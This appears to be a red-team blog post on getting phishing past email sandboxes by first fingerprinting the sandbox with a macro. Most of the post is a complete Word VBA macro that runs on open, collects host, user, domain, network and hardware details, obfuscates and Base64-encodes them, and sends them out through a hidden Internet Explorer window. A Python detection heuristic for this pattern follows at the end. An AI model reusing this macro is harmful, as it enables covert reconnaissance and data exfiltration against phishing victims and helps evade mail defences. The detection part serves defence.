I decided to mix things up a little bit and do a blog post on something a little different from the usual vulnerability research or CTF write-ups. The bulk of our day job is focused on performing long-term external assessments on customer networks, so I thought it might be useful to others to do a post on some hurdles we have had to overcome recently with regard to phishing.

In our experience, phishing is probably responsible for somewhere around 80% of initial network access from external sources. Unfortunately, this is due to poor user security training and a handful of other debatable reasons. To try to solve the overwhelming problem of click-happy users, IT administrators have begun installing hardware devices that detonate incoming emails containing macros in a sandbox to determine whether they perform malicious activity. These devices have become quite effective at stopping suspicious emails from even reaching users.

If you talk to anyone who has been working in security for any significant amount of time, they will tell you that offensive and defensive techniques evolve directly as a result of advances on the other side. In our scenario, offensive tactics consisted of emailing users with macros. As a result, defensive tools were developed to sandbox these emails to identify malicious activity. The next natural progression is offensive techniques that render sandboxing useless.

Our team had reasonable success bypassing these devices using various tricks employed by modern malware (see https://threatpost.com/malware-evades-detection-with-novel-technique/120787/ and http://www.securityweek.com/dyre-banking-trojan-counts-processor-cores-detect-sandboxes). Realizing that this problem was only going to become more prevalent, we decided to take the idea behind those techniques one step further.

We chose to exploit the function of these devices in order to bypass them. Given that they are designed to execute all code passed to them in a sandbox, we decided we would target the sandboxing hardware specifically. We picked an arbitrary email address in the target domain, constructed a blatant phishing email of the kind the target would likely see often, and attached a macro that performed extensive enumeration of any system that ran it. The macro then takes the results of this enumeration and posts them back to an attacker-controlled server. Using the results from the enumeration script, we are now able to create a macro that will only run on systems that do not match the fingerprint of the data we received from the email sandbox. This test can be repeated as many times as the red teamer feels is necessary to gain confidence in the results. An example enumeration macro is listed below.

Function MakeModel()
    ' Manufacturer and model string from WMI (Win32_ComputerSystem)
    retStr = ""
    strComputer = "."
    strQuery = "SELECT * FROM Win32_ComputerSystem"
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set colItems = objWMIService.ExecQuery(strQuery)
    For Each objItem In colItems
        retStr = objItem.Manufacturer
        retStr = retStr & "|" & objItem.Model
    Next
    MakeModel = retStr
End Function

Function EnvironVars()
    ' Host name, user, domain and logon server from environment variables
    sHostname = Environ("computername") & "|" & Environ("username") & _
                "|" & Environ("userdomain") & "|" & Environ("LOGONSERVER")
    EnvironVars = sHostname
End Function

Function RecentFiles()
    ' Number of entries in Word's recent files list
    Set wdApp = ActiveDocument.Application
    RecentFiles = wdApp.RecentFiles.Count
End Function

Function GetCores()
    ' Per-processor performance counter instances (one per logical processor plus _Total)
    Dim objWMI, cores, strQuery
    strQuery = "select * from Win32_PerfFormattedData_PerfOS_Processor"
    Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
    Set cores = objWMI.ExecQuery(strQuery, , 48)
    Set GetCores = cores
End Function

Function GetNetwork()
    ' MAC address and first IP address of every physical adapter that has IP enabled
    retStr = ""
    strComputer = "."
    strQuery = "Select * From Win32_NetworkAdapter Where PhysicalAdapter = True"
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set colItems = objWMIService.ExecQuery(strQuery)
    Set ipItems = objWMIService.ExecQuery("Select * From Win32_NetworkAdapterConfiguration")

    For Each objItem In colItems
        strMacAddress = objItem.MACAddress
        sysName = objItem.SystemName
        For Each ipItem In ipItems
            If ipItem.MACAddress = strMacAddress And ipItem.IPEnabled = True Then
                retStr = retStr & strMacAddress & "|" & ipItem.IPAddress(0) & "|"
                Exit For
            End If
        Next
    Next
    GetNetwork = retStr
End Function

Private Function Enc(ByVal strData As String) As Byte()
    ' Base64-encode via an MSXML bin.base64 node; the data type name is assembled from Chr() calls
    Dim arrData() As Byte
    arrData = StrConv(strData, vbFromUnicode)
    Set objXML = CreateObject("MSXml2.DOMDocument")
    Set objDocElem = objXML.createElement("data")
    objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
    objDocElem.nodeTypedValue = arrData
    Enc = objDocElem.Text
    Set objDocElem = Nothing
    Set objXML = Nothing
End Function

Private Function Dec(ByVal strData As String) As Byte()
    ' Base64-decode via the same MSXML node type
    Set objXML = CreateObject("MSXml2.DOMDocument")
    Set objDocElem = objXML.createElement("data")
    objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
    objDocElem.Text = strData
    Dec = objDocElem.nodeTypedValue
    Set objDocElem = Nothing
    Set objXML = Nothing
End Function

Sub DoStuff(ByVal strData As String)
    ' Send the encoded results to the collection server as a URL path using a hidden IE instance
    Dim IE As Object
    Dim strBaseURL As String
    Dim pre As String

    address = "http://127.0.0.1/"

    'strBaseURL = StrConv(Dec(address), 64)
    Set IE = CreateObject("InternetExplorer.Application")
    IE.Visible = False
    IE.navigate address & strData
    On Error GoTo ErrorHandler
    Do While IE.Busy: DoEvents: Loop
    Do While IE.ReadyState <> 4: DoEvents: Loop
    Set doc = IE.Document
    ' Click through IE's certificate warning page if one is shown
    If Not IsNull(doc.getElementById("overridelink")) Then
        Set lnkOverRide = doc.getElementById("overridelink")
        If Not lnkOverRide Is Nothing Then
            lnkOverRide.Click
            Do While IE.Busy: DoEvents: Loop
            Do While IE.ReadyState <> 4: DoEvents: Loop
            Set doc = IE.Document
        End If
    Else
        Do While IE.Busy: DoEvents: Loop
        Do While IE.ReadyState <> 4: DoEvents: Loop
        Set doc = IE.Document
    End If
    Dim testString As String
    testString = IE.Document.body.innerText
    IE.Stop
    IE.Quit

ErrorHandler:
    Exit Sub
End Sub

Sub AutoOpen()
    Dim retStr As String

    ' Count processor counter instances; subtract one for the _Total instance
    Set cores = GetCores
    Length = 0
    For Each i In cores
        Length = Length + 1
    Next

    retStr = Str(Length - 1)
    retStr = retStr & "|" & RecentFiles
    retStr = retStr & "|" & EnvironVars
    retStr = retStr & "|" & GetNetwork
    retStr = retStr & "|" & MakeModel
    retStr = Enc(retStr)

    DoStuff (retStr)
End Sub

We believe this technique to be reasonably effective against most modern email sandboxes. The only mitigations we can see are randomizing the enumeration results or blocking the outbound connection that carries them. The first would be quite difficult, since the enumeration script can poll any number of identifying pieces of data. The second would also be difficult, since the purpose of the sandbox is to let the malware run in order to profile it. For now, our team will save a few more hours creating phishing content and a few more dollars buying phishing domains. The ball is back in your court, defense.
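Added example (not code from the original post): a Python heuristic a mail gateway or analyst could run over VBA source extracted from an attachment to flag the enumerate-then-beacon pattern of the macro above, a detection-side check alongside the two mitigations named. The indicator list, weights and threshold are assumptions of this example, and both macro snippets are constructed samples: a condensed echo of the macro above and a benign formatting macro.

```python
import re

# Indicators of the enumerate-then-beacon macro pattern: (name, regex, category, weight).
# Categories let the verdict require both a fingerprinting source and an outbound sink.
# The Chr(54)/Chr(52) alternative matches the split "bin.base64" literal used above.
INDICATORS = [
    ("wmi_hardware_query", r"Win32_(ComputerSystem|NetworkAdapter|PerfFormattedData_PerfOS_Processor)\b", "enum", 2),
    ("environment_enum", r"Environ\(\s*\"(computername|username|userdomain|logonserver)\"", "enum", 1),
    ("recent_files_count", r"\bRecentFiles\.Count\b", "enum", 2),
    ("base64_via_msxml", r"bin\.base(?:64\b|\"\s*&\s*Chr\(54\)\s*&\s*Chr\(52\))", "encode", 1),
    ("ie_automation_beacon", r"InternetExplorer\.Application", "exfil", 2),
    ("auto_exec_entry", r"\bSub\s+(AutoOpen|Document_Open|Workbook_Open)\b", "trigger", 1),
]
COMPILED = [(n, re.compile(p, re.IGNORECASE), c, w) for n, p, c, w in INDICATORS]


def scan_macro(src):
    """Return matched indicator names, per-category counts and a weighted score for VBA source."""
    hits, categories, score = [], {}, 0
    for name, rx, cat, weight in COMPILED:
        if rx.search(src):
            hits.append(name)
            categories[cat] = categories.get(cat, 0) + 1
            score += weight
    return {"hits": hits, "categories": categories, "score": score}


def is_fingerprinting_beacon(src, threshold=5):
    """Flag only when enumeration and an outbound channel are both present and the score is high."""
    r = scan_macro(src)
    return r["score"] >= threshold and "enum" in r["categories"] and "exfil" in r["categories"]


# Constructed sample: a condensed version of the key lines of the macro above.
SUSPICIOUS = r'''
Sub AutoOpen()
    Set objWMI = GetObject("winmgmts:\\.\root\cimv2")
    Set cores = objWMI.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_Processor")
    s = Environ("computername") & "|" & ActiveDocument.Application.RecentFiles.Count
    objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
    Set IE = CreateObject("InternetExplorer.Application")
End Sub
'''

# Constructed sample: a benign auto-run macro that only formats the document.
BENIGN = r'''
Sub AutoOpen()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''
```

Run scan_macro on the VBA text pulled from an attachment (for example with olevba) to see which indicators fired; the benign sample only trips the auto-run trigger and is not flagged.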